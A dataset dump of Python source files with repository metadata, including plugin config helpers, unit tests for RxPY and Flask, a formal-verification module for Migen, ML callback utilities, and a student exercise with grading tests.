blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 3
288
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
112
| license_type
stringclasses 2
values | repo_name
stringlengths 5
115
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 684
values | visit_date
timestamp[us]date 2015-08-06 10:31:46
2023-09-06 10:44:38
| revision_date
timestamp[us]date 1970-01-01 02:38:32
2037-05-03 13:00:00
| committer_date
timestamp[us]date 1970-01-01 02:38:32
2023-09-06 01:08:06
| github_id
int64 4.92k
681M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 22
values | gha_event_created_at
timestamp[us]date 2012-06-04 01:52:49
2023-09-14 21:59:50
⌀ | gha_created_at
timestamp[us]date 2008-05-22 07:58:19
2023-08-21 12:35:19
⌀ | gha_language
stringclasses 147
values | src_encoding
stringclasses 25
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 128
12.7k
| extension
stringclasses 142
values | content
stringlengths 128
8.19k
| authors
listlengths 1
1
| author_id
stringlengths 1
132
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
3ad2dd87828157dd063f2b7458571a524017263a
|
833ae432c07ff3c33812b4847c247aa730a2549b
|
/glue/_plugin_helpers.py
|
341fbd440fc91bad6628fe8c03f9dba38fea1a07
|
[
"BSD-3-Clause"
] |
permissive
|
scalet98/glue
|
3e4bc49ac53766d4e1927da3434ad02410d93486
|
ff949ad52e205c20561f48c05f870b2abb39e0b0
|
refs/heads/master
| 2020-11-25T07:50:11.278074
| 2019-10-29T09:23:19
| 2019-10-29T09:23:19
| 228,563,694
| 1
| 0
|
NOASSERTION
| 2019-12-17T07:58:31
| 2019-12-17T07:58:31
| null |
UTF-8
|
Python
| false
| false
| 2,776
|
py
|
# The following function is a thin wrapper around iter_entry_points. The reason it
# is in this separate file is that when making the Mac app, py2app doesn't
# support entry points, so we replace this function with a version that has the
# entry points we want hardcoded. If this function was in glue/main.py, the
# reference to the iter_plugin_entry_points function in load_plugin would be
# evaluated at compile time rather than at runtime, so the patched version
# wouldn't be used.
from __future__ import absolute_import, division, print_function
import os
from collections import defaultdict
def iter_plugin_entry_points():
from pkg_resources import iter_entry_points
return iter_entry_points(group='glue.plugins', name=None)
class PluginConfig(object):
def __init__(self, plugins={}):
self.plugins = defaultdict(lambda: True)
self.plugins.update(plugins)
def __str__(self):
string = ""
for plugin in sorted(self.plugins):
string += "{0}: {1}\n".format(plugin, self.plugins[plugin])
return string
@classmethod
def load(cls):
# Import at runtime because some tests change this value. We also don't
# just import the variable directly otherwise it is cached.
from glue import config
cfg_dir = config.CFG_DIR
plugin_cfg = os.path.join(cfg_dir, 'plugins.cfg')
from glue.external.six.moves import configparser
config = configparser.ConfigParser()
read = config.read(plugin_cfg)
if len(read) == 0 or not config.has_section('plugins'):
return cls()
plugins = {}
for name, enabled in config.items('plugins'):
plugins[name] = bool(int(enabled))
self = cls(plugins=plugins)
return self
def save(self):
# Import at runtime because some tests change this value. We also don't
# just import the variable directly otherwise it is cached.
from glue import config
cfg_dir = config.CFG_DIR
plugin_cfg = os.path.join(cfg_dir, 'plugins.cfg')
from glue.external.six.moves import configparser
config = configparser.ConfigParser()
config.add_section('plugins')
for key in sorted(self.plugins):
config.set('plugins', key, value=str(int(self.plugins[key])))
if not os.path.exists(cfg_dir):
os.mkdir(cfg_dir)
with open(plugin_cfg, 'w') as fout:
config.write(fout)
def filter(self, keep):
"""
Keep only certain plugins.
This is used to filter out plugins that are not installed.
"""
for key in list(self.plugins.keys())[:]:
if key not in keep:
self.plugins.pop(key)
|
[
"thomas.robitaille@gmail.com"
] |
thomas.robitaille@gmail.com
|
3479e119a928a44bfb4b30588b082226216cfa06
|
97bf09cf62ddd060ec436bc0abdda8a1a78e57f9
|
/scripts/test/run_tests.py
|
4392a92d799968c527d36b1bb61228cda313639e
|
[
"BSD-3-Clause"
] |
permissive
|
Hiwatts/facebook360_dep
|
1911848900d6be6eabe72a088bab9cf7eae6ef02
|
3ecbe7f64f88b8a7b50bfa3deef6daad61a30443
|
refs/heads/master
| 2023-07-24T05:48:44.705469
| 2021-05-05T15:57:32
| 2021-05-05T16:04:43
| 396,123,779
| 0
| 0
|
NOASSERTION
| 2021-08-18T11:48:09
| 2021-08-14T20:35:58
| null |
UTF-8
|
Python
| false
| false
| 5,371
|
py
|
#!/usr/bin/env python3
# Copyright 2004-present Facebook. All Rights Reserved.
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree.
"""Runs all the unit tests defined in res/test/translator.json.
This is the main entrypoint for running the comprehensive test suite defined across
our applications. All the scripts desired by the specified "type" CLI argument will be run from
the test/ directory. If only a certain subset of the tests are desired, this can be specified in
a separate .json file and passed using the --static CLI flag.
Example:
For running all the CPU tests, use:
$ python run_tests.py \
--type=cpu
--binary_dir=/path/to/facebook360_dep/build/bin \
--dataset_root=s3://example/dataset
For running a statically-defined subset of the GPU tests, use:
$ python run_tests.py \
--type=gpu \
--static=/path/to/facebook360_dep/static.json \
--binary_dir=/path/to/facebook360_dep/build/bin \
--dataset_root=s3://example/dataset
"""
import json
import os
import sys
from pathlib import Path
from .test_align_colors import AlignColorsTest
from .test_calibration import CalibrationTest
from .test_calibration_lib_main import CalibrationLibMainTest
from .test_convert_to_binary import ConvertToBinaryTest
from .test_derp_cli import DerpCLITest
from .test_export_point_cloud import ExportPointCloudTest
from .test_generate_camera_overlaps import GenerateCameraOverlapsTest
from .test_generate_foreground_masks import GenerateForegroundMasksTest
from .test_import_point_cloud import ImportPointCloudTest
from .test_layer_disparities import LayerDisparitiesTest
from .test_master_class import generic_main, parser
from .test_project_equirects_to_cameras import ProjectEquirectsToCamerasTest
from .test_raw_to_rgb import RawToRgbTest
from .test_rig_aligner import RigAlignerTest
from .test_rig_analyzer import RigAnalyzerTest
from .test_rig_compare import RigCompareTest
from .test_rig_simulator import RigSimulatorTest
from .test_simple_mesh_renderer import SimpleMeshRendererTest
from .test_upsample_disparity import UpsampleDisparityTest
try:
import networkx as nx
load_static = False
except Exception:
load_static = True
def get_ordered_tests(tests_setup, test_type):
"""Determines the order of tests to be run, filtered to only return the specified type.
Args:
tests_setup (dict): Map of test name to its configuration (see: res/test/translator.json).
test_type (str): Which apps are to be tested. Must be one of "cpu", "gpu", or "both".
Returns:
list[str]: Names of the applications in the order they are to be run.
"""
test_graph = nx.DiGraph()
for test_app in tests_setup:
tests = tests_setup[test_app]
for test in tests:
if "truth" in test:
output_node = test["truth"]
else:
output_node = f"placeholder_{test_app}"
test_graph.add_nodes_from(test["datasets"])
test_graph.add_nodes_from([output_node])
for dataset in test["datasets"]:
if test_type == "both" or test["type"] == test_type:
print(dataset, output_node)
test_graph.add_edge(dataset, output_node, name=test_app)
ordered_nodes = list(nx.topological_sort(test_graph))
ordered_tests = []
for node in ordered_nodes:
for neighbor in test_graph.neighbors(node):
test_app = test_graph.get_edge_data(node, neighbor)["name"]
if test_app not in ordered_tests:
ordered_tests.append(test_app)
return ordered_tests
def run_tests(loader=None, res_dir=None):
"""Runs tests of the variant specified by CLI arguments. If "cpu" is specified,
CPU-only tests will be run and similarly for "gpu." Both are run if "both" is
passed in. If "static" is specified, the tests are run per their order in the
given static json file. Otherwise, the test order is automatically determined.
"""
parser.add_argument(
"--type", help="Type of tests to run (one of: cpu, gpu, both)", required=True
)
parser.add_argument(
"--static",
help="Static json w/ list of tests (use ONLY if NetworkX unavailable)",
)
args = parser.parse_args()
if not res_dir:
res_dir = os.path.join(
Path(os.path.abspath(__file__)).parents[2], "res", "test"
)
translator_path = os.path.join(res_dir, "translator.json")
with open(translator_path) as f:
tests_setup = json.load(f)
if load_static or args.static:
with open(args.static, "r") as f:
ordered_json = json.load(f)
ordered_tests = []
if (args.type == "both" or args.type == "cpu") and "cpu" in ordered_json:
ordered_tests += ordered_json["cpu"]
if (args.type == "both" or args.type == "gpu") and "gpu" in ordered_json:
ordered_tests += ordered_json["gpu"]
else:
ordered_tests = get_ordered_tests(tests_setup, args.type)
test_classes = []
for test in ordered_tests:
test_classes.append(getattr(sys.modules[__name__], test))
generic_main(test_classes, loader, res_dir)
if __name__ == "__main__":
run_tests()
|
[
"facebook-github-bot@users.noreply.github.com"
] |
facebook-github-bot@users.noreply.github.com
|
68be4a145f5591cd39cece0984dc6931714f5716
|
44c65c93549aa06b01ef9114817cd45e645da6f7
|
/tests/test_observable/test_concat.py
|
7b28c6f1c9fd20302717129da1983eaa60fd0f1c
|
[
"Apache-2.0"
] |
permissive
|
Affirm/RxPY
|
692b6a0089f4e79b92c0c683f11427c558eefd06
|
7c23939ea497761c85b382257f9f0954998ab91e
|
refs/heads/master
| 2023-07-06T11:34:28.229747
| 2017-10-22T16:25:56
| 2017-10-22T16:25:56
| 108,198,347
| 0
| 2
|
Apache-2.0
| 2023-03-20T20:28:56
| 2017-10-25T00:18:37
|
Python
|
UTF-8
|
Python
| false
| false
| 7,099
|
py
|
import unittest
from rx import Observable
from rx.testing import TestScheduler, ReactiveTest
on_next = ReactiveTest.on_next
on_completed = ReactiveTest.on_completed
on_error = ReactiveTest.on_error
subscribe = ReactiveTest.subscribe
subscribed = ReactiveTest.subscribed
disposed = ReactiveTest.disposed
created = ReactiveTest.created
class RxException(Exception):
pass
# Helper function for raising exceptions within lambdas
def _raise(ex):
raise RxException(ex)
class TestConcat(unittest.TestCase):
def test_concat_empty_empty(self):
scheduler = TestScheduler()
msgs1 = [on_next(150, 1), on_completed(230)]
msgs2 = [on_next(150, 1), on_completed(250)]
e1 = scheduler.create_hot_observable(msgs1)
e2 = scheduler.create_hot_observable(msgs2)
def create():
return e1.concat(e2)
results = scheduler.start(create)
results.messages.assert_equal(on_completed(250))
def test_concat_empty_never(self):
scheduler = TestScheduler()
msgs1 = [on_next(150, 1), on_completed(230)]
e1 = scheduler.create_hot_observable(msgs1)
e2 = Observable.never()
def create():
return e1.concat(e2)
results = scheduler.start(create)
results.messages.assert_equal()
def test_concat_never_empty(self):
scheduler = TestScheduler()
msgs1 = [on_next(150, 1), on_completed(230)]
e1 = scheduler.create_hot_observable(msgs1)
e2 = Observable.never()
def create():
return e2.concat(e1)
results = scheduler.start(create)
results.messages.assert_equal()
def test_concat_never_never(self):
scheduler = TestScheduler()
e1 = Observable.never()
e2 = Observable.never()
def create():
return e1.concat(e2)
results = scheduler.start(create)
results.messages.assert_equal()
def test_concat_empty_throw(self):
ex = 'ex'
scheduler = TestScheduler()
msgs1 = [on_next(150, 1), on_completed(230)]
msgs2 = [on_next(150, 1), on_error(250, ex)]
e1 = scheduler.create_hot_observable(msgs1)
e2 = scheduler.create_hot_observable(msgs2)
def create():
return e1.concat(e2)
results = scheduler.start(create)
results.messages.assert_equal(on_error(250, ex))
def test_concat_throw_empty(self):
ex = 'ex'
scheduler = TestScheduler()
msgs1 = [on_next(150, 1), on_error(230, ex)]
msgs2 = [on_next(150, 1), on_completed(250)]
e1 = scheduler.create_hot_observable(msgs1)
e2 = scheduler.create_hot_observable(msgs2)
def create():
return e1.concat(e2)
results = scheduler.start(create)
results.messages.assert_equal(on_error(230, ex))
def test_concat_throw_throw(self):
ex = 'ex'
scheduler = TestScheduler()
msgs1 = [on_next(150, 1), on_error(230, ex)]
msgs2 = [on_next(150, 1), on_error(250, 'ex2')]
e1 = scheduler.create_hot_observable(msgs1)
e2 = scheduler.create_hot_observable(msgs2)
def create():
return e1.concat(e2)
results = scheduler.start(create)
results.messages.assert_equal(on_error(230, ex))
def test_concat_return_empty(self):
scheduler = TestScheduler()
msgs1 = [on_next(150, 1), on_next(210, 2), on_completed(230)]
msgs2 = [on_next(150, 1), on_completed(250)]
e1 = scheduler.create_hot_observable(msgs1)
e2 = scheduler.create_hot_observable(msgs2)
def create():
return e1.concat(e2)
results = scheduler.start(create)
results.messages.assert_equal(on_next(210, 2), on_completed(250))
def test_concat_empty_return(self):
scheduler = TestScheduler()
msgs1 = [on_next(150, 1), on_completed(230)]
msgs2 = [on_next(150, 1), on_next(240, 2), on_completed(250)]
e1 = scheduler.create_hot_observable(msgs1)
e2 = scheduler.create_hot_observable(msgs2)
def create():
return e1.concat(e2)
results = scheduler.start(create)
results.messages.assert_equal(on_next(240, 2), on_completed(250))
def test_concat_return_never(self):
scheduler = TestScheduler()
msgs1 = [on_next(150, 1), on_next(210, 2), on_completed(230)]
e1 = scheduler.create_hot_observable(msgs1)
e2 = Observable.never()
def create():
return e1.concat(e2)
results = scheduler.start(create)
results.messages.assert_equal(on_next(210, 2))
def test_concat_never_return(self):
scheduler = TestScheduler()
msgs1 = [on_next(150, 1), on_next(210, 2), on_completed(230)]
e1 = scheduler.create_hot_observable(msgs1)
e2 = Observable.never()
def create():
return e2.concat(e1)
results = scheduler.start(create)
results.messages.assert_equal()
def test_concat_return_return(self):
scheduler = TestScheduler()
msgs1 = [on_next(150, 1), on_next(220, 2), on_completed(230)]
msgs2 = [on_next(150, 1), on_next(240, 3), on_completed(250)]
e1 = scheduler.create_hot_observable(msgs1)
e2 = scheduler.create_hot_observable(msgs2)
def create():
return e1.concat(e2)
results = scheduler.start(create)
results.messages.assert_equal(on_next(220, 2), on_next(240, 3), on_completed(250))
def test_concat_throw_return(self):
ex = 'ex'
scheduler = TestScheduler()
msgs1 = [on_next(150, 1), on_error(230, ex)]
msgs2 = [on_next(150, 1), on_next(240, 2), on_completed(250)]
e1 = scheduler.create_hot_observable(msgs1)
e2 = scheduler.create_hot_observable(msgs2)
def create():
return e1.concat(e2)
results = scheduler.start(create)
results.messages.assert_equal(on_error(230, ex))
def test_concat_return_throw(self):
ex = 'ex'
scheduler = TestScheduler()
msgs1 = [on_next(150, 1), on_next(220, 2), on_completed(230)]
msgs2 = [on_next(150, 1), on_error(250, ex)]
e1 = scheduler.create_hot_observable(msgs1)
e2 = scheduler.create_hot_observable(msgs2)
def create():
return e1.concat(e2)
results = scheduler.start(create)
results.messages.assert_equal(on_next(220, 2), on_error(250, ex))
def test_concat_some_data_some_data(self):
scheduler = TestScheduler()
msgs1 = [on_next(150, 1), on_next(210, 2), on_next(220, 3), on_completed(225)]
msgs2 = [on_next(150, 1), on_next(230, 4), on_next(240, 5), on_completed(250)]
e1 = scheduler.create_hot_observable(msgs1)
e2 = scheduler.create_hot_observable(msgs2)
def create():
return e1.concat(e2)
results = scheduler.start(create)
results.messages.assert_equal(on_next(210, 2), on_next(220, 3), on_next(230, 4), on_next(240, 5), on_completed(250))
|
[
"dag@brattli.net"
] |
dag@brattli.net
|
3d37da637d2574b7f62ac05306ea06e985dab24c
|
ae10b60cb92a69146bfb05ef5dde735a0aa45d4b
|
/examples/Extended Application/sklearn/examples/manifold/plot_swissroll.py
|
7c79aa7f21f247e89add004d85ca228061582301
|
[
"MIT"
] |
permissive
|
kantel/nodebox-pyobjc
|
471cea4c5d7f1c239c490323186458a74edcc214
|
068ba64c87d607522a240ab60c3ba14f869f6222
|
refs/heads/master
| 2021-08-14T18:32:57.995445
| 2017-11-16T13:42:23
| 2017-11-16T13:42:23
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,103
|
py
|
"""
===================================
Swiss Roll reduction with LLE
===================================
An illustration of Swiss Roll reduction
with locally linear embedding
"""
# Author: Fabian Pedregosa -- <fabian.pedregosa@inria.fr>
# License: BSD 3 clause (C) INRIA 2011
print(__doc__)
import matplotlib.pyplot as plt
# This import is needed to modify the way figure behaves
from mpl_toolkits.mplot3d import Axes3D
Axes3D
# nodebox section
if __name__ == '__builtin__':
# were in nodebox
import os
import tempfile
W = 800
inset = 20
size(W, 600)
plt.cla()
plt.clf()
plt.close('all')
def tempimage():
fob = tempfile.NamedTemporaryFile(mode='w+b', suffix='.png', delete=False)
fname = fob.name
fob.close()
return fname
imgx = 20
imgy = 0
def pltshow(plt, dpi=150):
global imgx, imgy
temppath = tempimage()
plt.savefig(temppath, dpi=dpi)
dx,dy = imagesize(temppath)
w = min(W,dx)
image(temppath,imgx,imgy,width=w)
imgy = imgy + dy + 20
os.remove(temppath)
size(W, HEIGHT+dy+40)
else:
def pltshow(mplpyplot):
mplpyplot.show()
# nodebox section end
#----------------------------------------------------------------------
# Locally linear embedding of the swiss roll
from sklearn import manifold, datasets
X, color = datasets.samples_generator.make_swiss_roll(n_samples=1500)
print("Computing LLE embedding")
X_r, err = manifold.locally_linear_embedding(X, n_neighbors=12,
n_components=2)
print("Done. Reconstruction error: %g" % err)
#----------------------------------------------------------------------
# Plot result
fig = plt.figure()
ax = fig.add_subplot(211, projection='3d')
ax.scatter(X[:, 0], X[:, 1], X[:, 2], c=color, cmap=plt.cm.Spectral)
ax.set_title("Original data")
ax = fig.add_subplot(212)
ax.scatter(X_r[:, 0], X_r[:, 1], c=color, cmap=plt.cm.Spectral)
plt.axis('tight')
plt.xticks([]), plt.yticks([])
plt.title('Projected data')
# plt.show()
pltshow(plt)
|
[
"karstenwo@web.de"
] |
karstenwo@web.de
|
9bad6a345a6bdffa026f01429de7892977c34495
|
fd64e364368bcb2cdcf77ab1e0fc234a6b698f69
|
/Python/Easy/CHEFSETC.py
|
48d298e8c44654557290eaf4fd4a08a2753e58f3
|
[] |
no_license
|
Parizval/CodeChefCodes
|
57712069f3d56cc42282f9e35c6ddd9398e4a5bf
|
cfd2876816be806882650b6ea51431b1f8d6bec5
|
refs/heads/master
| 2021-07-16T13:10:15.668713
| 2020-07-06T21:40:09
| 2020-07-06T21:40:09
| 188,693,667
| 5
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 506
|
py
|
import itertools
def findsubsets(s, n):
return [set(i) for i in itertools.combinations(s, n)]
for a in range(int(input())):
elements = set(map(int,input().split()))
check = False
for i in range(1,5,1):
array = findsubsets(elements,i)
for i in array:
if sum(i) == 0 :
# print(i)
check = True
break
if check:
break
if check:
print("Yes")
else:
print("No")
|
[
"anmolgoyal@gmail.com"
] |
anmolgoyal@gmail.com
|
42b03dcc9562188ff8a81630422edb51674a221c
|
2c54320b0bebb4351d6056d117796c11b6fb1441
|
/test_endpoints.py
|
5511b26bb32d7594a6d5ed3116bbdfc142a99fdb
|
[] |
no_license
|
Amertz08/flask-ci
|
f728ca59c67d24b5d437de8acd469d2460151f01
|
a67c0417345b6b67f86d7f18d509f1f192cf862a
|
refs/heads/master
| 2020-03-23T08:53:14.389682
| 2018-07-18T02:18:29
| 2018-07-18T02:18:29
| 141,353,864
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 582
|
py
|
import unittest
from flask import url_for
from flask_testing import TestCase
from app import create_app
class TestApp(TestCase):
def create_app(self):
return create_app()
def test_index(self):
resp = self.client.get(url_for('main.index'))
try:
with open('version.txt', 'r') as f:
_hash = f.read()
except FileNotFoundError:
_hash = 'version.txt not found'
self.assert200(resp)
self.assertEqual(resp.data, f'Hello {_hash}'.encode())
if __name__ == '__main__':
unittest.main()
|
[
"adammertz@gmail.com"
] |
adammertz@gmail.com
|
b7cd1f9a1aea1fcef7d9de69a39850cb6d63dafc
|
ff6248be9573caec94bea0fa2b1e4b6bf0aa682b
|
/log-20190927/132.230.102.123-10.21.12.20/1569574219.py
|
4a95238224a8297f24bd861789148dd266556edb
|
[] |
no_license
|
LennartElbe/codeEvo
|
0e41b1a7705204e934ef71a5a28c047366c10f71
|
e89b329bc9edd37d5d9986f07ca8a63d50686882
|
refs/heads/master
| 2020-12-21T17:28:25.150352
| 2020-03-26T10:22:35
| 2020-03-26T10:22:35
| 236,498,032
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,653
|
py
|
import functools
import typing
import string
import random
import pytest
## Lösung Teil 1.
def divisors(n)->list:
teiler = []
if n < 0:
return "Ungültige Eingabe"
else:
for i in range(1, n+1):
if n%i == 0:
teiler = teiler + [i]
return [teiler]
######################################################################
## hidden code
def mk_coverage():
covered = set()
target = set(range(6))
count = 0
def coverage(func):
nonlocal covered, target, count
def wrapper(n):
nonlocal covered, count
if n <= 0:
covered.add(0)
if n == 1:
covered.add(1)
r = func (n)
lenr = len (r)
if lenr == 1:
covered.add(2)
if lenr == 2:
covered.add(3)
if (lenr > 2) and ( lenr % 2 == 0):
covered.add(4)
if lenr > 2 and lenr % 2 == 1:
covered.add(5)
count += 1
return r
if func == "achieved": return len(covered)
if func == "required": return len(target)
if func == "count" : return count
if func.__doc__:
wrapper.__doc__ = func.__doc__
wrapper.__hints__ = typing.get_type_hints (func)
return wrapper
return coverage
coverage = mk_coverage()
try:
divisors = coverage(divisors)
except:
pass
## Lösung Teil 2. (Tests)
def test_divisors():
assert divisors(1) == [1]
assert divisors(5) == [1]
assert divisors (10) == [1, 2, 5]
######################################################################
## hidden tests
pytest.main (["-v", "--assert=plain", "-p", "no:cacheprovider"])
from inspect import getfullargspec
class TestNames:
def test_divisors (self):
assert divisors
assert 'n' in getfullargspec(divisors).args
class TestGrades:
def test_docstring_present(self):
assert divisors.__doc__ is not None
def test_typing_present(self):
assert divisors.__hints__ == typing.get_type_hints(self.divisors_oracle)
def test_coverage(self):
assert coverage("achieved") == coverage("required")
def divisors_oracle(self, n:int)->list:
return [ d for d in range (1, n + 1) if n % d == 0 ]
def check_divisors (self, x):
assert set(divisors (x)) == set(self.divisors_oracle (x))
def test_correctness(self):
for i in range (100):
self.check_divisors (i)
n = random.randrange (10000)
self.check_divisors (n)
|
[
"lenni.elbe@gmail.com"
] |
lenni.elbe@gmail.com
|
a8b53a582053bf011063b816014242b9cc4b3276
|
a34dc024004dded61c9a5612e047fc4537534ddb
|
/scripts/utils.py
|
ca1dc8ab17fc6a2132b90e53bb34b9903dcce3b4
|
[] |
no_license
|
tehZevo/aegis-scripts
|
29ca28998f3fb2c6c8f7960ef56df8bff5e9970d
|
280435890fc7661e73aff65ef28bd9b2a5b24055
|
refs/heads/master
| 2020-07-21T12:23:55.913579
| 2020-03-06T01:26:40
| 2020-03-06T01:26:40
| 206,863,972
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,183
|
py
|
from tensorflow.keras import optimizers as O
import retro
import gym
from aegis_core.callbacks import TensorboardFieldCallback, TensorboardCallback
from aegis_core.callbacks import TensorboardActions, TensorboardPGETReward
from aegis_core.callbacks import TensorboardPGETWeights, TensorboardPGETTraces
class DummyEnv(gym.Env):
def __init__(self, obs_space, action_space):
self.observation_space = obs_space
self.action_space = action_space
def list_retro_games(filter=None):
games = retro.data.list_games()
for game in games:
if filter is None or filter in game.lower():
print(game)
optis = {
"sgd": O.SGD,
"rmsprop": O.RMSprop,
"adagrad": O.Adagrad,
"adadelta": O.Adadelta,
"adam": O.Adam,
"adamax": O.Adamax,
"nadam": O.Nadam
}
def create_optimizer(args):
if args.optimizer is not None:
return optis[args.optimizer](args.learning_rate, clipnorm=args.clipnorm)
return "sgd" #sigh
def env_callbacks(summary_writer, env_name, interval="done"):
cbs = [
#log sum of rewards every episode
TensorboardFieldCallback(summary_writer, "reward", name_format="{}/" + env_name,
reduce="sum", interval=interval, step_for_step=False),
#log action distribution every episode
TensorboardActions(summary_writer, env_name=env_name, interval=interval,
step_for_step=False),
]
return cbs
def pget_callbacks(summary_writer, name, interval=100, outlier_z=2):
cbs = [
TensorboardPGETWeights(summary_writer, name, interval=interval,
combine=False, step_for_step=True),
TensorboardPGETTraces(summary_writer, name, interval=interval,
combine=False, step_for_step=True, outlier_z=outlier_z),
TensorboardPGETReward(summary_writer, name, interval=interval,
step_for_step=True),
]
return cbs
def curiosity_callbacks(summary_writer, name, interval=100):
cbs = [
TensorboardFieldCallback(summary_writer, "loss", name_format=name + " curiosity/{}",
reduce="mean", interval=interval, step_for_step=True),
TensorboardFieldCallback(summary_writer, "surprise", name_format=name + " curiosity/{}",
reduce="mean", interval=interval, step_for_step=True),
]
return cbs
|
[
"tehzevo@users.noreply.github.com"
] |
tehzevo@users.noreply.github.com
|
d9bee4ad7b23f641753a2fe3e8fa91e75064ef95
|
4f41601218f7c270a9b1bb0b02a45522dfb586df
|
/miform/structure.py
|
74b867359fe58dc888aa44f38c23b1ce2fe4bec6
|
[] |
no_license
|
cr1901/miform
|
3e7372cf5f5d2ece04b5df17f8582ed2795ada1f
|
23abfbe16a5064cbd267719ebbb66e08f594b689
|
refs/heads/master
| 2021-07-13T08:58:18.657665
| 2017-10-15T18:01:03
| 2017-10-15T18:01:03
| 106,760,269
| 4
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,706
|
py
|
from migen.fhdl.structure import _Statement, wrap, _check_statement
from migen.fhdl.specials import Special
from migen.fhdl.verilog import _AT_BLOCKING, _printexpr as verilog_printexpr
from migen.fhdl.module import _flat_list, _cd_append
import miform.verilog
class _FormalStatement:
pass
class _FormalTask:
def __init__(self):
pass
def to_system_verilog(self):
raise NotImplementedError
class Formal(Special):
"""
The Migen Special for formal verification. This is mainly required to
place all formal statements in their own block.
"""
def __init__(self):
Special.__init__(self)
self.init = list()
self.imm = list()
self.conc = list()
self.glob = list()
self.sync = dict()
"""
Add an assertion or assumption for formal verification purposes.
Parameters
----------
statement : _Statement(), in
A Migen Statement that contains a _FormalStatement such as Assume or Assert;
such statements are tested only when the conditions for the Assume/Assert
are met.
The statement itself can also be a _FormalStatement; these statements
are continously assumed to be true or tested to be true, at all clock ticks.
"""
def add(self, statement):
if not _check_statement(statement):
raise TypeError("Input to Formal specials must be Migen statements")
if isinstance(statement, _FormalStatement):
if statement.initial:
# Initial asserts/assumes look similar to concurrent, though
# the initial "block" is considered an event (I think?).
self.init.append(statement)
else:
# Top-level formal asserts/assumes not bound by other events- i.e.
# checked for all time- are by definition concurrent.
self.conc.append(statement)
else:
# TODO: ensure at least one statement in list is a _FormalStatement.
self.imm += _flat_list(statement)
"""Add an assertion using the SystemVerilog $globalclock task. This is the implied clock
during formal verification; in `yosys`, if the `clk2dfflogic` pass
is executed, all other Migen clock domains, including the default "sys"
clock domain, become synchronous inputs relative to the $global_clock.
Parameters
----------
statement : _Statement(), in
A Migen Statement that is asserted/assumed each tick of the $global_clock.
"""
def add_global(self, statement):
self.glob += _flat_list(statement)
"""Add an assertion that is checked on the positive-edge of the input
clock domain.
Parameters
----------
cd : str, in
Name of the clock-domain for which the assertion/assumption is checked.
statement : _Statement(), in
A Migen Statement that is asserted/assumed each positive-edge of the named `cd`.
"""
def add_sync(self, cd, statement):
_cd_append(self.sync, cd, statement)
@staticmethod
def emit_verilog(formal, ns, add_data_file):
def pe(e):
return verilog_printexpr(ns, e)[0]
r = "`ifdef FORMAL\n"
for i in formal.init:
if isinstance(i, Assert):
r += "initial assert (" + pe(i.cond) + ");\n"
elif isinstance(i, Assume):
r += "initial assume (" + pe(i.cond) + ");\n"
r += "\n"
for c in formal.conc:
if isinstance(c, Assert):
r += "assert property (" + pe(c.cond) + ");\n"
elif isinstance(c, Assume):
r += "assume property (" + pe(c.cond) + ");\n"
else:
TypeError("Only Assume and Assert supported for concurrent assertions.")
r += "\n"
for i in formal.imm:
r += "always @(*) begin\n"
r += miform.verilog._formalprintnode(ns, _AT_BLOCKING, 1, i)
r += "end\n"
r += "\n"
r += miform.verilog._formalprintsync(formal, ns)
r += "\n"
for g in formal.glob:
r += "always @($global_clock) begin\n"
r += miform.verilog._formalprintnode(ns, _AT_BLOCKING, 1, g)
r += "end\n"
r += "`endif\n"
return r
class Assert(_Statement, _FormalStatement):
"""Assert a condition
Parameters
----------
cond : _Value(1), in
Condition
initial : bool, in
Only test the assertion on the first cycle. Defaults to false.
Ignored if the assert is not continuous.
Examples
--------
>>> a = Signal()
>>> b = Signal()
>>> c = Signal()
>>> If(c,
... Assert(a == b)
... )
"""
def __init__(self, cond, initial=False):
self.cond = wrap(cond)
self.initial = initial
class Assume(_Statement, _FormalStatement):
"""Assume a condition holds
Parameters
----------
cond : _Value(1), in
Condition
initial : bool, in
Only assume `cond` on the first cycle. Defaults to false.
Ignored if the assume is not continuous.
Examples
--------
>>> a = Signal()
>>> Assume(a == 0)
"""
def __init__(self, cond, initial=False):
self.cond = wrap(cond)
self.initial=initial
# class GlobalClock(_Statement, _FormalStatement, _FormalTask):
# """The SystemVerilog $globalclock task. This is the implied clock
# during formal verification; in `yosys`, if the `clk2dfflogic` pass
# is executed, all clock domains become synchronous relative to the
# global clock."""
# def __init__(self):
# pass
#
# def to_system_verilog(self):
# return "$"
|
[
"thor0505@comcast.net"
] |
thor0505@comcast.net
|
8e4ac45e01675c7b4f520a4a23d18060dc8c7369
|
cab678a44ecef2fcb9102588006e3080d4529481
|
/microsoft/store/partnercenterservices/models/microsoft_partner_sdk_contracts_v1_support_topic.py
|
df2acd2a2202668d37743f77e8790c7ac41b5299
|
[] |
no_license
|
eduardomourar/partner-center-python
|
410f61f1ff0dfa8fe34414b1012edba983c289dc
|
85e9617d58347fb6c3b8d50b728f9a10201e2f10
|
refs/heads/master
| 2020-04-19T19:21:16.543501
| 2020-01-28T12:10:33
| 2020-01-28T12:10:33
| 168,386,194
| 2
| 0
| null | 2020-01-28T12:10:35
| 2019-01-30T17:38:16
|
Python
|
UTF-8
|
Python
| false
| false
| 1,722
|
py
|
# coding=utf-8
# --------------------------------------------------------------------------
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class MicrosoftPartnerSdkContractsV1SupportTopic(Model):
"""Describes a support topic. Service requests specify a support topic to
ensure that they are processed quickly and effectively.
Variables are only populated by the server, and will be ignored when
sending a request.
:param name: Gets or sets the name of the support topic.
:type name: str
:param description: Gets or sets the description of the support topic.
:type description: str
